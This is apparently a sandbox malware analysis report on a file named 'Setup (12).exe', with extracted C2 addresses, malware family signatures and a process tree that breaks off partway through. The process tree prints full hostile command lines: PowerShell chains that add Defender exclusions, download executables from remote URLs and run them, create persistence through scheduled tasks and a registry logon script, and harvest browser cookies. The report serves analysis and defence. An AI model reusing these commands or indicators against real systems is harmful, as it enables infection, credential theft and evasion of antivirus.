Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    717s
  • max time network
    1245s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    21-08-2021 10:21

General

  • Target

    Setup (12).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bc6269f31h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bcfeb5393h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120c8f91373ch?raw

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

redline

Botnet

@Gerhdhd

C2

46.8.19.177:41228

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 13 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • Blocklisted process makes network request 42 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 10 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 12 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 15 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 27 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 30 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 38 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious behavior: SetClipboardViewer 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2712
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2688
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
        • Suspicious use of SetThreadContext
        • Modifies registry class
        PID:2672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Drops file in System32 directory
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          PID:5488
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2404
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2364
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1896
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1456
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1272
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1264
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1068
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:948
                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        2⤵
                          PID:6484
                      • C:\Users\Admin\AppData\Local\Temp\Setup (12).exe
                        "C:\Users\Admin\AppData\Local\Temp\Setup (12).exe"
                        1⤵
                        • Checks computer location settings
                        • Modifies system certificate store
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:4000
                        • C:\Users\Admin\Documents\egf1xE2dePkVcJyFYsZAwfvX.exe
                          "C:\Users\Admin\Documents\egf1xE2dePkVcJyFYsZAwfvX.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:1908
                        • C:\Users\Admin\Documents\S6i5yHSWOumQUXQ7aq8mquvz.exe
                          "C:\Users\Admin\Documents\S6i5yHSWOumQUXQ7aq8mquvz.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:428
                          • C:\Users\Admin\Documents\S6i5yHSWOumQUXQ7aq8mquvz.exe
                            C:\Users\Admin\Documents\S6i5yHSWOumQUXQ7aq8mquvz.exe
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4620
                        • C:\Users\Admin\Documents\QozSu6C7eiPhsf6Cm7oPEeRg.exe
                          "C:\Users\Admin\Documents\QozSu6C7eiPhsf6Cm7oPEeRg.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:2724
                          • C:\Users\Admin\Documents\QozSu6C7eiPhsf6Cm7oPEeRg.exe
                            C:\Users\Admin\Documents\QozSu6C7eiPhsf6Cm7oPEeRg.exe
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4660
                        • C:\Users\Admin\Documents\EM4MIjOLeYgui4wLr_Pa93fH.exe
                          "C:\Users\Admin\Documents\EM4MIjOLeYgui4wLr_Pa93fH.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:588
                        • C:\Users\Admin\Documents\oHxX9f80lkOzWZf5Q9gzl1Yn.exe
                          "C:\Users\Admin\Documents\oHxX9f80lkOzWZf5Q9gzl1Yn.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:2268
                          • C:\Users\Admin\Documents\oHxX9f80lkOzWZf5Q9gzl1Yn.exe
                            "C:\Users\Admin\Documents\oHxX9f80lkOzWZf5Q9gzl1Yn.exe" -q
                            3⤵
                            • Executes dropped EXE
                            PID:4956
                        • C:\Users\Admin\Documents\wAcgbogrN13JHpcCHupbgEDb.exe
                          "C:\Users\Admin\Documents\wAcgbogrN13JHpcCHupbgEDb.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:3700
                        • C:\Users\Admin\Documents\971ct7wQun4JE3wZVvMByQV_.exe
                          "C:\Users\Admin\Documents\971ct7wQun4JE3wZVvMByQV_.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:4080
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 660
                            3⤵
                            • Program crash
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4900
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 676
                            3⤵
                            • Program crash
                            PID:1044
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 684
                            3⤵
                            • Program crash
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4952
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 668
                            3⤵
                            • Program crash
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4100
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 1152
                            3⤵
                            • Program crash
                            PID:6088
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 1112
                            3⤵
                            • Program crash
                            PID:6060
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 1104
                            3⤵
                            • Suspicious use of NtCreateProcessExOtherParentProcess
                            • Program crash
                            PID:5172
                        • C:\Users\Admin\Documents\86JVMzCPfRDWmI5H8fFWNTIr.exe
                          "C:\Users\Admin\Documents\86JVMzCPfRDWmI5H8fFWNTIr.exe"
                          2⤵
                          • Executes dropped EXE
                          • Drops file in Program Files directory
                          PID:400
                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                            "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                            3⤵
                            • Executes dropped EXE
                            PID:4920
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              4⤵
                              • Executes dropped EXE
                              PID:3060
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              4⤵
                              • Executes dropped EXE
                              PID:3484
                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                            3⤵
                              PID:4968
                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                              "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                              3⤵
                              • Executes dropped EXE
                              PID:5020
                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                4⤵
                                  PID:5128
                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  4⤵
                                    PID:3852
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5128
                                  • C:\Windows\system32\WerFault.exe
                                    C:\Windows\system32\WerFault.exe -u -p 5020 -s 1512
                                    4⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    PID:6232
                              • C:\Users\Admin\Documents\BBRdox9tEOt2h2ezZ7YF4fTW.exe
                                "C:\Users\Admin\Documents\BBRdox9tEOt2h2ezZ7YF4fTW.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:348
                              • C:\Users\Admin\Documents\2T6cGRAhZgq_bFYW29boX7Uj.exe
                                "C:\Users\Admin\Documents\2T6cGRAhZgq_bFYW29boX7Uj.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:2212
                                • C:\Users\Admin\Documents\2T6cGRAhZgq_bFYW29boX7Uj.exe
                                  C:\Users\Admin\Documents\2T6cGRAhZgq_bFYW29boX7Uj.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5052
                              • C:\Users\Admin\Documents\LiF8eHRin4eaD5ElMEix7WhD.exe
                                "C:\Users\Admin\Documents\LiF8eHRin4eaD5ElMEix7WhD.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:804
                                • C:\Users\Admin\Documents\LiF8eHRin4eaD5ElMEix7WhD.exe
                                  "C:\Users\Admin\Documents\LiF8eHRin4eaD5ElMEix7WhD.exe"
                                  3⤵
                                  • Modifies data under HKEY_USERS
                                  PID:8076
                              • C:\Users\Admin\Documents\lZytKy5lmkQ9ZV8vBVyWAgL9.exe
                                "C:\Users\Admin\Documents\lZytKy5lmkQ9ZV8vBVyWAgL9.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:3692
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                  3⤵
                                    PID:4984
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                      4⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4456
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                      4⤵
                                        PID:7696
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                        4⤵
                                          PID:7400
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                          4⤵
                                            PID:8912
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                            4⤵
                                              PID:7448
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                              4⤵
                                              • Blocklisted process makes network request
                                              PID:6204
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                              4⤵
                                              • Blocklisted process makes network request
                                              PID:6488
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                              4⤵
                                                PID:8156
                                                • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                  5⤵
                                                    PID:8588
                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                      6⤵
                                                        PID:808
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          7⤵
                                                            PID:5568
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                            7⤵
                                                              PID:7524
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                              7⤵
                                                                PID:9404
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                7⤵
                                                                • Blocklisted process makes network request
                                                                PID:2324
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                7⤵
                                                                  PID:9024
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                6⤵
                                                                • Blocklisted process makes network request
                                                                PID:7448
                                                                • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                  7⤵
                                                                  • Drops file in System32 directory
                                                                  PID:8856
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                    8⤵
                                                                      PID:2728
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                        9⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:9224
                                                                    • C:\Windows\system32\services32.exe
                                                                      "C:\Windows\system32\services32.exe"
                                                                      8⤵
                                                                        PID:9360
                                                                        • C:\Windows\system32\cmd.exe
                                                                          "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                          9⤵
                                                                            PID:9472
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                              10⤵
                                                                                PID:9544
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                10⤵
                                                                                  PID:9764
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                  10⤵
                                                                                    PID:6004
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                    10⤵
                                                                                      PID:5160
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                    9⤵
                                                                                      PID:10084
                                                                                      • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                        10⤵
                                                                                        • Drops file in System32 directory
                                                                                        PID:10136
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                          11⤵
                                                                                            PID:10236
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                              12⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:9416
                                                                                          • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                                                                                            "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                                                                                            11⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:3852
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                            11⤵
                                                                                              PID:9636
                                                                                              • C:\Windows\system32\choice.exe
                                                                                                choice /C Y /N /D Y /T 3
                                                                                                12⤵
                                                                                                  PID:4036
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                          8⤵
                                                                                            PID:9404
                                                                                            • C:\Windows\system32\choice.exe
                                                                                              choice /C Y /N /D Y /T 3
                                                                                              9⤵
                                                                                                PID:9516
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                                                      4⤵
                                                                                      • Blocklisted process makes network request
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      PID:5268
                                                                                      • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                                                        5⤵
                                                                                        • Adds Run key to start application
                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                        PID:5136
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                                                                      4⤵
                                                                                        PID:4692
                                                                                        • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                                                                          5⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:7104
                                                                                          • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                            "{path}"
                                                                                            6⤵
                                                                                              PID:10176
                                                                                            • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                              "{path}"
                                                                                              6⤵
                                                                                                PID:10048
                                                                                      • C:\Users\Admin\Documents\nuruuuOxHWw1pABP7kfy2KM5.exe
                                                                                        "C:\Users\Admin\Documents\nuruuuOxHWw1pABP7kfy2KM5.exe"
                                                                                        2⤵
                                                                                          PID:3404
                                                                                          • C:\Users\Admin\AppData\Roaming\5869148.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\5869148.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2704
                                                                                          • C:\Users\Admin\AppData\Roaming\6986126.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\6986126.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            PID:4752
                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:3024
                                                                                          • C:\Users\Admin\AppData\Roaming\5564427.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\5564427.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:3176
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-JVRI3.tmp\Inlog.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-JVRI3.tmp\Inlog.tmp" /SL5="$40246,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            PID:1428
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-1MDE4.tmp\Setup.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-1MDE4.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                              4⤵
                                                                                                PID:7928
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-ACML5.tmp\Setup.tmp
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-ACML5.tmp\Setup.tmp" /SL5="$7007A,17369807,721408,C:\Users\Admin\AppData\Local\Temp\is-1MDE4.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                  5⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • Drops file in Program Files directory
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  PID:5312
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-VFKM6.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                    6⤵
                                                                                                      PID:7544
                                                                                                      • C:\Windows\SysWOW64\expand.exe
                                                                                                        expand C:\Users\Admin\AppData\Local\Temp\is-VFKM6.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                        7⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        PID:6676
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                      6⤵
                                                                                                        PID:3724
                                                                                                        • C:\Windows\SysWOW64\reg.exe
